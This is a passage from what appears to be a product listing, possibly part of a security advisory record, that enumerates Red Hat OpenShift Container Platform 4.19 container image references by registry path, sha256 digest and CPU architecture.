"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:a35e6d40471cdcec9fa54afc1da4c2ddb4ff2739b65bc67ddbff655aaf45a09f_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:6c6b2ab932649b97579c8a76f57d9c8f0c8b2dededcd0843563d7bb85d116b8b_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:ab8f35a5cc7907c3114427a3f46489cf2cc54650caa9d15b1654fff6f0e43dc3_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:ceedbad08f41cb0095006089b0595524a1ffa3c035f39e59d5ebbd5be07fcdce_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:fc090f33468f64fdd024263813034bd889ec44c61587ee9c1ecb8abdb9921da0_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:23369a9840fe178321aa47458d1fea488bf37545f4a335d39ba4cc0711019c3e_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:784f4206de4bb479ae43476c483face9ba3b209188b3a0201f66580b944fca02_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:87546cc6262c2c6eadb54266c42ccc03c3e2ad7c3c809ee21529f0bfb4707105_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:ed079597ea5b2fe6bf4d4b7efa09f6cb76691362c62a268accb0d5bb5fd7daed_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:2845efdf030408d0d545862b74020ec95c2e2f4c0fbcd6d5834002fd1f224b9a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:ae56b7456515539ec14105e5a8221b83dc53c1a5571a6e46e0c3b0632f98096c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:b3351e1878d5ef1111ce4b2eca74bad875b8773b11b8597f83c11a7f7b226da7_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:b72fc45f6e78468f442c5bf487721227053eb0d49ef3eea5be6cef181007e290_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:12309e06f58c6b122ebc7ef2958ec0a0526edd9ea21b888866dcc2f753a7cf2d_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:5727ab378cdf09a1eb20b6120da5ee6d66a1473ea0d7dfd0709faf5c53df615f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:d85ca66233c95a4b622d97b50ae304dab7cd3ea67efbc40ab9ddb723478104b7_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:f26b039b69b5d006e04148dd4e7d6bcada2ae22c8892e094e43c6bb307a99cea_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:1f2b394a49751e0cbc81a776a8abefaee56aea8a2449a56f66ec4fb8bd7b36a0_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:5a3bb13d5a7dfd660ce6ca1799af07ff0eb73148a51b3e5864fda09650186530_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:a676ed9f3d05a12ca0965f8b33d002d95cc8578f5a74f0bcf984594d784b0e3c_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:dbd96ce5c1082dd3f2de07bd34f805d64952bee798cd96f2d9f94d195acbfd2e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:0104fa2a05916db8ce121350b3e026a74891560be71999451943090f63d727a2_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:590caaaf15b7a11ce69df24820ddc1f4b0b7a1c7cc5d2e62e2c3bfd35a5bb733_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:69d052085b27f034e581680b283ed51134f2d8d5c895f0b2984946c158304249_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:69f33223ac1b30068c884ba58ef4f04545ed5d02dab43dd525ff3f66c299885f_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-utils-rhel9@sha256:0beec3d7cd2663215fbfd97490b8aa1a684580e273dd9161d574f3ce5fe936b5_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-utils-rhel9@sha256:19636219d56bc03c8641e266ed3d82cae94bd7431e3da0c48ccba9bfb541ef6f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-utils-rhel9@sha256:2ad51487bd9dd02bdabe506d2c5758a9e9df2903a8a63d1a19d720281390eebc_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-utils-rhel9@sha256:7c081487e39de209265d2bb960fb68fa2997e1620f37bdd3bb1aac57483bbbe7_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:13560a7a1ab60ebe5a593c4c6819d730f1e8fad5031a5a38b7aa8ebcb52776b9_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:4f90910be0a33320bf234e3c25b6c364a0e730d76be53fc8c7e50227c14e25e2_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:7406a10e78b85749cd597d3ced8b69a87a7931119611e996dd8cd660ff1ac47c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:d710074f9ebfa1ec4e15c5ee4718b748259f8907f4ec0aa56045c00cf19a691c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-cloud-controller-manager-rhel9@sha256:6bf2ac59bb7ee40409082d564bde5d5568be09bd21219fe0c62ebc6624912b1a_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-cloud-controller-manager-rhel9@sha256:8ad00ec95b55f781061f47a2b0b7b2ae6e557bb9cdbad826c097fde6a5b7d791_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-cluster-api-controllers-rhel9@sha256:3dc93509b8cad942ffeea32ba1c75db4b94a66a8c1a6d7b29f13ed6ec83e5f9b_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-cluster-api-controllers-rhel9@sha256:ae91dc01aca5115ba88290f86ab266ad69b86c68c83097adafb82defdfc5c524_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9-operator@sha256:67f9c3e3f77df4be9e4925fe7c5fb4cb95d770395bbb1b32847c7100d8f9e8fe_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9-operator@sha256:ef09a660c5bd1b44464ed961ade4f9ceef47dfe1005efde15de94631dadebf4f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9@sha256:d1a5ebdd8e8fcd15749e48a18cf340a309c6c219c8adf85d2df1caa773784d86_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9@sha256:de7f8ba8b4ed81e733af2d6b40e2dbb97c7afdc627973bfb838bd69ed9183eba_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-pod-identity-webhook-rhel9@sha256:15b866541c161693e74ad7106aec45b9713f81e1f3e2f10deb0822b58fbb884e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-pod-identity-webhook-rhel9@sha256:240132f7cf6ec28b4f711323b5c9f10ba76e85ba0ed2e66c663096089fdcc128_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cloud-controller-manager-rhel9@sha256:2191714083728cc0984775c5b8c3ee972723c1378058f0923ab60036345d9825_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cloud-controller-manager-rhel9@sha256:249b48b699ef21517d11a3533293184b1524b5907fec00593a98f0581363dc12_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cloud-node-manager-rhel9@sha256:660ad818c22efdd4fb965ded889c7ed08b331cb8d50c145bd4a34e74158f790a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cloud-node-manager-rhel9@sha256:deb01110f819b3534a2bd24b5406c69bcf5011eaebdeec438a31f1cd68f18029_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cluster-api-controllers-rhel9@sha256:255b3979a3a054696f21f437998c892b5738cbbcdc021b0a22752f1d9bb48712_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cluster-api-controllers-rhel9@sha256:d665a06a23572a2bcf3345f9c22b2b9895292e1f43d5532b793a3ea4df0c42c8_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9-operator@sha256:086285dd82aadc71803c847a06a2e0727b4fbb09f07a5bf95979ebc50bb95e82_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9-operator@sha256:0f5c719b22dbba95b6d61db0c63ba8107689a7d61f6944e0d2dc5fa3e693d25e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9@sha256:1452416d5cfd9acae6f0bf60da783ec8cf632784655f4602462cf380cd7fe518_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9@sha256:b13a67c30437a6950f41cdda853305d03ac24809746bdca955782db1c59824b1_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-file-csi-driver-operator-rhel9@sha256:43f58c25df6d439ab60c6a7fd905db92d67678bf55732103069b9d3ce9a6ee1d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-file-csi-driver-operator-rhel9@sha256:5eca83117e60a69246033c3cedcc2e2962e0f0a6ae6d6d7e3c35546cdc78ce70_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-file-csi-driver-rhel9@sha256:daddd3f94f513bfce03ea0c5aa406164838aa7bc41c3251b02686fd86da09d7a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-file-csi-driver-rhel9@sha256:f1a3870617f3e6c0774b5484820351c404cabe3161684c6edf3b81554cf9f1de_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-workload-identity-webhook-rhel9@sha256:4f54884bb854edec3a1a28ba089ddc068edc3ad0677637dd9b033a1c0ff8052c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-workload-identity-webhook-rhel9@sha256:834a2b63a74d7af617155da8f25a36f196b7c16a78154468b1cb88a10fdfa88d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:3f79fe8b748ce5015d5d71ce8da20bbff7241868e87066d1d50083a3ceb91bfe_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:66745a12cf917414d197c589e7e57a62958da4c66d5372e848e40568d8ddfafc_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:900e5ff2f8ea86f0864c6a3cd1707a620427189f5bfffa0bb0ea9a8c0ed85330_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:c029ff100811f13c0ba79c03044e0c6f096567511c336e4d1ecced6e900c2acd_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:37fe6420e98e7d1927492a7a40fd01578cfaf441530b7bf2f85cc7d593d7b097_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:480d7e114879e0c9bcfd62250af7f2f7b4a25e7d4cca65d97c422349fe164334_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:6f49794879ad8a54b4a9ba77661ebdf84cb90a048d1472c1f878c10a9ecc46e6_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:77c778debce0cb2eff5f5e66a3db3e30905e0138de3ddc3cd5330d2a79ec2cf9_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:6aef6b3ea8ceb252107d24252c9c155e21d42825343e2a824d869f897a86da4f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:895cb0d9b4715a75c1ffa4539bbd86c14f774e664ab16f5df4bc3e55ef537225_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:99fc0e641a6014bad4027471174578ba22c0a4a99c05b6bca1e8c838bbda0a90_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:aee32f17c4c4aa3deaca4a1884efc7c1a05d4fdadea145b247c4364e9e82086a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:07f2b6c01f22078c6b6eea7916982ebfcf6f992daf0d80af7b18972e6c484868_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:3efbeb0ba231cc16b69a86c43c28aa02b7e773413b361ceaf82c72cb215dc187_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:a212996fe27771f82406dc36d68e07e29ecf975834c3cde6395b35cd259edbe9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:b7f1f48335150e9e3ff89c0c349345f2c7fb6d7cf27793d263cca791d53f260c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:39852b09d2ff95f03cff6f39398c67d30d64366f00a0ca73319d81831b7f6e23_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:6d2dbe2a871324b770da093074a9fcac3aa590896e366354f8202bf80eae70ed_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:9df2c55943c62172a5ab42fcd2309a232a8e455240efeba614e2e70308972764_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:e6aaec6333f15e8aa67ad391f57eb7225007c068947982d18fea6b90d837e6e2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:02c4fe2761b586f29c78d9419f0b90d98bee92b8d4fa47ec77dfe45795fab7fb_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:4b1a4e3c67e3fc5c14a8cb7130eec3ea191f27473942f7afb09b497a30236947_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:a9e099fe57f31d4e86d0edbad9605aae421fbe410d1b7c2f6e7036940ba5e319_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:e3504f1bb6b8b89f4f01ecefc3c8646cbc949d638bfa6db0638476731d9f0e96_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-rhel9@sha256:1cdfe759fe6d9b1745276957b712c1a46a69ce1c59706a7ba9ca8f3f89cc844d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-rhel9@sha256:2fafd2b4c0fb8500c0180c767e55f70d26203e68500e64d252fe3a10227a161a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-rhel9@sha256:5a96f6965efd6579efde9b1a1b4ae88b57cbb49f38cf2a39ef90a55470a30667_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-rhel9@sha256:95c126293ef394a5ce8882e8cfa9c6f6c22e9cae79e64e07f0e1e57a8fb55211_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:4e885357cb52fffbb832d31d97400cfc629f26d5c38b4692379d08ba485f46d2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:645168f7cb91679d374bc1e431181a1b964dec279265ec52e5809b368e08654c_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:7c20e19cdbb62a268ffea39d5e0004fb4e6b587c41250c73180043f56b9fe0e5_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:c17396793e30858f900b68ed2981f38062d501b7600a5e4ca127d4e14113aca4_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:56453e8ce0dbb39d0259d2f0b36f58d8f049bf6c1a880b8a1eaa37d8ade32067_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:6513461d1b413d648dc1d2327fac029633f5d34322459f2752d1096648fa37b4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:9a083427c52dcc2f9716408cf23991613eef7c41fb6eb1ee4841491276971039_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:dcfe6ab706950430187a24e9792b6f0c270f813841e799ea7e35623679269ae5_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:334e975b0d8a94ec45ade469bf86809c9a07e9456cda5d5c71d6f91a2877faa0_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:64dfc7beaf3a8cfdab85ba963db74971ca68b6cf614aa04279f4af3239806e4c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:7b99d625b14ced1fd44520bd106906dd60f84e7794257fe3b4d3a3aa685ebbbc_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:8b854d27a269e0f6b6d542f652c504ab0678ac18d1b84db63078257eebe090cf_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:2601add0c23c9e27079274736508adab64c6ae4128f66a53df3f569fe2d9fe3f_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:6917cb0e3b073a13ec29e5c329f01cf2ec26e78d47c3c8360d0063d186a4ba53_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:a400d84e7f46869a2c2f75b6f221684879b680910b5e5e4662e074a020483cf4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:d94b765497d2fa316fbf4ec374572a5fba96a99b78dfe02b6ed6986e2b7782e6_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:26b8049bd1a84ed402fad985ca842bf91ba86fbc5e46f7dea0050120ca551643_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:4c28562416c8308c00af299859adfd3cfb4ef790ef2b6668299dc487c6fa3f45_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:645feaaa568676e0c2b1c620a81a1a60d321800b940d46d2514aa59e1f25e2c9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:78bdc6e0ac3da2daf1f39e07c6554ac500deec9670561477f9cf0a346e1145bf_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:59b6c20394bfa15bb36a9ac9b4ef03ae6bdadfcfd110c46fee13ac2abc9f6fa3_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:79a30df8b6d7ef52409a3145663550ccf0fbde7e5bffc7e91ccefe2f276e44af_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:9324047c73a33a920fe6403604cd123f81dc7663c4780934f4da3b95f0bb5bac_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:960007197db71f1b34bdeadf7bc13323cff680b273f795dfcffc569867f695b2_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:0685735bcfb4c4a112c1796dcfccf10233e0e62e1538520aa6e02abf8dd88c27_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:12bfb2d2bbc5c7bbf8a161f97c1521d0a5c7ef8ad6e3aca825e62cf066a51109_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:d9a9c57749c9d3e56e51d0b67ac5929949a900b1e6c96a4414366afc1ef4ba3b_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:f3650443d49b825783ed4f308ff994be4b24c86dee1e2825274d58e0d4b02a28_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:9d90ec3d15ade36e666eee154f9b934259cf811b4a9f987ef18300b78bbe35d3_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:9feb86c7f0170dfae9273fe7e3ba662b7333ce8d05ee411b9e7d9c82447b2f2c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:a1bc835a8621c88b52ddff53d6701b5cefe7cc6f2efb80836c239cb333945043_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:e53bfa8ab4ae569c697bba0b37c25afb495cc6cf324fb4ed50bd8ffc737c04f9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:1264333969e9e7825b6ece8ed3a80a3eeac54564ae51d2aed817e4028fbef931_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:aa2f9d5b3b26615c429128234a5dea3cfa7f4f6d5ce3d9d4e6bf6796bafbb50b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:b2115e5268813615088ca48f0138ff6910b07513be4177cd74485d2d41f0e249_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:c8e791718d7e4a68571b873bd0c68aeffc217fe69ee7e74741ecda295fb67dbd_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:290f5dcc66373ff79cbcda33e6fbba989c48ae2bf8b623c57e065110e36524db_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:572cc6f2f303a9190588696d5bdc80fca9ac3c32d5de9c5d94a27861c871a1c5_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:d1561efe3cc68b60fbfc765e028dee3cf4a7666dc499f028c98603075d99a9d7_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:e04cc25c77ffb05e86a6fea6dc8a6e5c35563612305adbcb98cd0b4832c97ed1_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:96fdf677680bf809356060d0af7fc9166608de5dc4d546e671f3071910558381_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:a13951576eb84ab6c6d3b800976320f8bebadad21e49b38faa99e8d1adcc520f_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:a8ce501ca7269a42fbb749fd0d3adb03c49468282e1f41e483e569c8acc1f777_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:cd0bb571991f485f4f33aadb8434e1d5e3b6c3bf7ac4e1e62994de0b190b6ec6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:0c5df10c40e0bfbed23f193b9aedaf953a5e1e3f4cbbe5f1924866d1ec7f55cf_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:4cdff720094bd0b07e3dd6ae9b5b88756a890fd1ac39361629c44817766fe69e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:b28fe78ee564e859188499e768d57e3e0fe2ad0afb715b0d76ce0c99960f3cd1_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:eb91a50e029bf839ff7be93783acbbd5ea72ba6f3bf9f9dc10c0588c23280f51_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:0ac703dd7441374f349bfeb3639c1a7e364c9764aeb4b9ac05ea7879cce4a5a1_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:4b6155be40a57801b21c44a7b50f89801b15dba8a51dad03969b25bee1a22b6b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:adedcc1ce23f14f3759818cddb9dbbe73dc1f772e3b58e229433f7b6e2f0f5b8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:e81081ad64219f09b1eef538df2903264d087d898aa81bebb6634fe4342efc59_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:5185785b29d581adb9e8ed4e23ba11c7d67090f4c6e59b0287d2a36c83fd8ae1_s390x",
